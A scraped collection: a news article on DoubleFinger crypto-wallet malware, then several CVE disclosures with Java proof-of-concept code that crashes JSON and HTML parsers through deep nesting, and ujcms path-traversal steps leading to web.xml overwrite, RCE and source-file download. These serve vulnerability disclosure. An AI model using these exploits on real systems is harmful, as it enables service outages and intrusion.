By Waqas
DoubleFinger Malware: Two-Fold Attack on Crypto Wallets with GreetingGhoul Stealer.
This is a post from HackRead.com Read the original post: New “DoubleFinger” Malware Strikes Cryptocurrency Wallets

DoubleFinger malware downloads encrypted components from Imgur.com, a seemingly innocent image-sharing platform that disguises the files as PNG images.

In a recent report released by cybersecurity experts at Kaspersky, a new strain of malware named “DoubleFinger” has emerged as a serious concern for **cryptocurrency enthusiasts**.

The emergence of DoubleFinger malware, equipped with a multistage attack strategy resembling an advanced persistent threat (APT), showcases the increasing sophistication of malicious actors in the realm of crimeware development.

The malware operates by initiating a series of events triggered by a malicious email attachment that contains a PIF file. Once the attachment is opened, DoubleFinger malware downloads encrypted components from Imgur.com, a seemingly innocent image-sharing platform that disguises the files as PNG images. These components include a loader for the subsequent stages, a legitimate java.exe file, and another PNG file to be utilized later in the attack.

In its **report**, Kaspersky Team wrote that after executing the loader, DoubleFinger malware skillfully evades security software and progresses to the subsequent stages. In the fourth stage, it employs a technique called Process **Doppelganging** to replace a legitimate process with a modified version, housing the fifth-stage payload. This payload installs the infamous GreetingGhoul crypto stealer, scheduled to run daily and specifically target victims’ crypto wallets including Ledger and Trezor.

Fake Windows for famous wallets aiming at stealing data (Left) – The malicious image file (Right) – Credit: Kaspersky

Kaspersky’s technical analysis of GreetingGhoul reveals its dual functionality. The first component identifies crypto-wallet applications within the system and steals valuable data, including private keys and seed phrases. The second component overlays the interfaces of cryptocurrency applications, intercepts user input, and grants cybercriminals control over and access to the victims’ funds.

It is worth noting that certain variations of DoubleFinger malware also install the remote access **Trojan Remcos**, granting cybercriminals complete control over the infected system. This further exacerbates the risks associated with the malware and emphasizes the need for proactive measures to protect against such attacks.

To **safeguard cryptocurrency wallets**, Kaspersky recommends a range of preventive actions, including maintaining a vigilant stance against scams, diversifying wallet usage, being aware of vulnerabilities associated with cold wallets, and purchasing hardware wallets exclusively from official sources, among other precautions.

Kaspersky’s Sergey Lozhkin **stressed** the importance of collective responsibility, stating, “Protecting crypto wallets is a shared responsibility between the wallet providers, individuals, and the broader cryptocurrency community.”

By remaining vigilant, implementing robust security measures, and staying informed about the latest threats, users can mitigate the risks associated with DoubleFinger malware and ensure the safety of their **valuable digital assets**.

As the battle between cybercriminals and security experts continues, cryptocurrency enthusiasts must remain proactive and stay one step ahead of those seeking to exploit the rapidly evolving world of digital currencies.

**RELATED ARTICLES**

1.  Bandit Stealer Stealing Crypto from Windows PCs
2.  Namecheap Phishing Emails Hacking Crypto Wallets
3.  MortalKombat Ransomware Aiming for Crypto Wallets
4.  “GodFather” Android Malware Hits Crypto Wallets Apps
5.  Cracked Software: BHUNT password stealer hits crypto funds

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New “DoubleFinger” Malware Strikes Cryptocurrency Wallets

An issue was discovered htmlcleaner thru = 2.28 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by htmlcleaner parsing of untrusted HTML String****Description**

Using htmlcleaner to parse untrusted HTML String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.util.HashMap$KeyIterator.<init>(HashMap.java:1531)
    	at java.base/java.util.HashMap$KeySet.iterator(HashMap.java:913)
    	at java.base/java.util.HashSet.iterator(HashSet.java:173)
    	at org.htmlcleaner.HtmlCleaner.addIfNeededToPruneSet(HtmlCleaner.java:1339)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:332)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    	at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
    
    
    

**PoC**

        <dependency\>
            <groupId\>net.sourceforge.htmlcleaner</groupId\>
            <artifactId\>htmlcleaner</artifactId\>
            <version\>2.28</version\>
        </dependency\>

import org.htmlcleaner.HtmlCleaner;
import org.htmlcleaner.TagNode;

public class PoC {
    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "<div>", "</div>", "");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String htmlData = TOO\_DEEP\_DOC;
        try {

            // 模糊测试组件的风险接口
            HtmlCleaner cleaner = new HtmlCleaner();
            TagNode root = cleaner.clean(htmlData);

            // 对解析结果进行进一步操作
            // ...

        } catch (Exception e) {
            // 处理异常
        }
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34624: Stack overflow error caused by htmlcleaner parsing of untrusted HTML String · Issue #13 · amplafi/htmlcleaner

Directory traversal vulnerability in ujcms 6.0.2 allows attackers to move files via the rename feature.

\[Vulnerability description\]  
The Remote Code Execution (RCE) vulnerability exists in ujcms v6.0.2, when the project is partially configured on Linux using Tomcat, attackers can use path traversal and arbitrary file uploads to execute arbitrary code.

\[Vulnerability Type\]  
Remote Code Execution (RCE)

\[Vendor of Product\]  
https://gitee.com/ujcms/ujcms  
https://github.com/ujcms/ujcms  
https://www.ujcms.com/

\[Affected Product Code Base\]  
v6.0.2

\[Vulnerability proof\]  
The code restricts the access and execution of jsp and jspx files, but it exists in any path and any file upload, so you can upload a web.xml file and add a jsp resolvable suffix, such as abc

    <servlet-mapping>
        <servlet-name>jsp</servlet-name>
        <url-pattern>*.abc</url-pattern>
    </servlet-mapping>
    

Condition: It needs to be deployed with tomcat on Linux, and the configuration file cannot be overwritten on Windows, and File.renameTo is used

1.  Upload web.xml  
    Download an initial configuration file web.xml of tomcat, and add the above configuration in the following location  
      
    Upload the web.xml file to the uploads directory first, and use the path id to indicate it when uploading, and the path cannot be traversed  
      
    Rename, the capture package can traverse the path at the file name, and overwrite the original web.xml  
    
2.  Upload the Trojan horse  
    Upload a Trojan horse and execute the ping command. At this time, the uploaded suffix cannot be the custom analytical suffix above. You can upload any suffix and rename it later, otherwise the upload will not succeed  
      
    The upload suffix is ​​abc1  
      
    Renamed to ../../123.abc, the path traverses to the root directory  
      
    Visit 123.abc and successfully trigger rce  
    

\[Code Details\]

1.  Upload  
    Track the rename interface, find that the parameters are being passed to doUpload, and verify the suffix at the upload  
    com.ujcms.cms.core.web.backendapi.AbstractUploadController#doUpload  
      
    The suffix can be uploaded without any problem.
    
2.  Rename  
    com.ujcms.cms.core.web.backendapi.AbstractWebFileController#rename is the same as upload, it has checkName to verify the file name, enter here to view the code  
      
    com.ujcms.cms.core.web.backendapi.AbstractWebFileController#checkName(java.lang.String) Check the file name, when both meet  
    (1) The file name is empty  
    (2) The file name contains illegal characters  
    an exception is thrown, but the first condition is always false, and the conditions cannot be met at the same time, so this verification will always be bypassed, so it can be executed, and then any file can be renamed and uploaded.  
      
    So there is a problem with the judgment logic here, it should be || instead of &&, which leads to the failure of the security check in this place. Of course, this is also the reason why it can be used successfully.  
    After passing the verification of this block, use File.renameTo in com.ujcms.util.file.LocalFileHandler#rename to rename the file.  
      
    renameTo cannot overwrite files in Windows, but can overwrite and create directories in Linux, so this vulnerability can only be exploited in Linux.

CVE-2023-34865: There is a remote code execution (RCE) vulnerability exists in ujcms v6.0.2 · Issue #5 · ujcms/ujcms

An issue was discovered jtidy thru r938 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by jtidy parsing of untrusted Html String****Description**

Using jtidy to parse untrusted Html String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.nio.charset.Charset.lookup(Charset.java:457)
    	at java.base/java.nio.charset.Charset.isSupported(Charset.java:503)
    	at java.base/java.lang.StringCoding.lookupCharset(StringCoding.java:101)
    	at java.base/java.lang.StringCoding.decode(StringCoding.java:234)
    	at java.base/java.lang.String.<init>(String.java:467)
    	at org.w3c.tidy.TidyUtils.getString(TidyUtils.java:658)
    	at org.w3c.tidy.Lexer.getToken(Lexer.java:2343)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2051)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
    	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
    
    

**PoC**

        <dependency\>
            <groupId\>net.sf.jtidy</groupId\>
            <artifactId\>jtidy</artifactId\>
            <version\>r938</version\>
        </dependency\>

import org.w3c.tidy.Tidy;

import java.io.StringReader;

public class PoC {
    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "<div>", "</div>", "");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String htmlData = TOO\_DEEP\_DOC;
        try (StringReader stringReader = new StringReader(htmlData);){
            Tidy tidy = new Tidy();
            tidy.parse(stringReader, System.out);
        } catch (Exception e) {
        }
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34623: Stack overflow error caused by jtidy parsing of untrusted Html String · Issue #4 · trajano/jtidy

An issue was discovered in Ujcms v6.0.2 allows attackers to gain sensitive information via the dir parameter to /api/backend/core/web-file-html/download-zip.

\[Vulnerability description\]

Ujcms v6.0.2 has a sensitive file reading problem. When using Tomcat to deploy the project, the background zip package downloads the html directory, and modifying the dir parameter causes the source code and configuration files to be downloaded

\[Vulnerability Type\]  
Sensitive file reading(Information Disclosure)

\[Vendor of Product\]  
https://gitee.com/ujcms/ujcms  
https://github.com/ujcms/ujcms  
https://www.ujcms.com/

\[Affected Product Code Base\]  
v6.0.2

\[Vulnerability proof\]

Condition: tomcat deployment project

The dir parameter is allowed to be set to "WEB-INF/", and the names parameter is allowed to be set to "classes", so that the source code and web configuration files can be downloaded directly.(There is no html directory by default, you can create it directly through the function)

\[Code Details\]

com.ujcms.cms.core.web.backendapi.AbstractWebFileController#downloadZip  
The code checks the two parameters "dir" and "names" separately

com.ujcms.cms.core.web.backendapi.AbstractWebFileController#checkId(java.lang.String)  
Check whether there is directory traversal, no restrictions on accessible directories

com.ujcms.cms.core.web.backendapi.AbstractWebFileController#checkName(java.lang.String)Check the file name, when both meet  
(1) The file name is empty  
(2) The file name contains illegal characters  
Accessible directories are not restricted

CVE-2023-34878: Ujcms v6.0.2 has a sensitive file reading problem · Issue #6 · ujcms/ujcms

An issue was discovered flexjson thru 3.3 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by flexjson serialization List****Description**

flexjson before v3.3 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

**Error Log**

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.util.Stack.push(Stack.java:67)
    at flexjson.JSONContext.pushTypeContext(JSONContext.java:140)
    at flexjson.JSONContext.writeOpenArray(JSONContext.java:268)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:24)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)

**PoC**

<dependency>
<groupId>net.sf.flexjson</groupId>
<artifactId>flexjson</artifactId>
<version>3.3</version>
</dependency>

importflexjson.JSONSerializer;

importjava.util.ArrayList;

publicclass PoC3{
publicstaticvoidmain(String[]args){

ArrayList<Object>list=newArrayList<>();
list.add(list);

Strings=newJSONSerializer().deepSerialize(list);
}
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）)
    

**References**

1.  https://github.com/jettison-json/jettison/issues/52
2.  https://github.com/jettison-json/jettison/pull/53/files

CVE-2023-34609: Flexjson / Bugs / #51 Stack overflow error caused by flexjson serialization List

An issue was discovered mjson thru 1.4.1 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by mjson parsing of untrusted JSON String****Description**

Using mjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.lang.ThreadLocal.get(ThreadLocal.java:165)
    	at mjson.Json.factory(Json.java:1192)
    	at mjson.Json.array(Json.java:1291)
    	at mjson.Json$Reader.readArray(Json.java:2787)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    	at mjson.Json$Reader.read(Json.java:2715)
    	at mjson.Json$Reader.readArray(Json.java:2788)
    
    

**PoC**

        <dependency\>
            <groupId\>org.sharegov</groupId\>
            <artifactId\>mjson</artifactId\>
            <version\>1.4.1</version\>
        </dependency\>

import mjson.Json;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        Json.read(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34611: Stack overflow error caused by mjson parsing of untrusted JSON String · Issue #40 · bolerio/mjson

An issue was discovered hjson thru 3.0.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by hjson parsing of untrusted JSON String****Description**

Using hjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at org.hjson.HjsonParser.read(HjsonParser.java:454)
    	at org.hjson.HjsonParser.skipWhiteSpace(HjsonParser.java:411)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:185)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    	at org.hjson.HjsonParser.readValue(HjsonParser.java:119)
    	at org.hjson.HjsonParser.readObject(HjsonParser.java:199)
    
    

**PoC**

        <dependency\>
            <groupId\>org.hjson</groupId\>
            <artifactId\>hjson</artifactId\>
            <version\>3.0.0</version\>
        </dependency\>

import org.hjson.JsonValue;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = "{" + \_nestedDoc(TOO\_DEEP\_NESTING, "a : { ", "} ", "") + "}";


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JsonValue.readHjson(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34620: Stack overflow error caused by hjson parsing of untrusted JSON String  (2) · Issue #24 · hjson/hjson-java

An issue was discovered JSONUtil thru 5.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by jsonutil parsing of untrusted JSON String****Description**

Using jsonutil to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at net.pwall.util.ParseText.skipSpaces(ParseText.java:1072)
    	at net.pwall.json.JSON.parse(JSON.java:535)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    	at net.pwall.json.JSON.parse(JSON.java:567)
    
    

**PoC**

        <dependency\>
            <groupId\>net.pwall.json</groupId\>
            <artifactId\>jsonutil</artifactId\>
            <version\>5.0</version\>
        </dependency\>

import net.pwall.json.JSON;

public class PoC {

    public final static int TOO\_DEEP\_NESTING = 9999;
    public final static String TOO\_DEEP\_DOC = \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");


    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        JSON.parse(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34615: Stack overflow error caused by jsonutil parsing of untrusted JSON String · Issue #10 · billdavidson/JSONUtil

An issue was discovered ph-json thru 9.5.5 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

**Stack overflow error caused by ph-json parsing of untrusted JSON String****Description**

Using ph-json to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

**Error Log**

    Exception in thread "main" java.lang.StackOverflowError
    	at java.base/java.util.ArrayList.get(ArrayList.java:459)
    	at com.helger.commons.collection.impl.ICommonsList.getLast(ICommonsList.java:201)
    	at com.helger.commons.collection.impl.ICommonsList.getLast(ICommonsList.java:186)
    	at com.helger.commons.collection.NonBlockingStack.peek(NonBlockingStack.java:112)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addToStackPeek(CollectingJsonParserHandler.java:51)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addSimple(CollectingJsonParserHandler.java:71)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler._addCollection(CollectingJsonParserHandler.java:76)
    	at com.helger.json.parser.handler.CollectingJsonParserHandler.onArrayStart(CollectingJsonParserHandler.java:115)
    	at com.helger.json.parser.JsonParser._readArray(JsonParser.java:804)
    	at com.helger.json.parser.JsonParser._readValue(JsonParser.java:959)
